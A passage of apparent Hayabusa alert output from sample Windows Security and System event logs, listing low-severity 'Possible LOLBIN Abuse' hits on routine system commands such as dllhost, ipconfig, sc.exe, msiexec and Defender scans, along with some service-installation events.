/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.431 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1044 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 01:18:44.458 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x16d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:09:39.134 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.355 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: 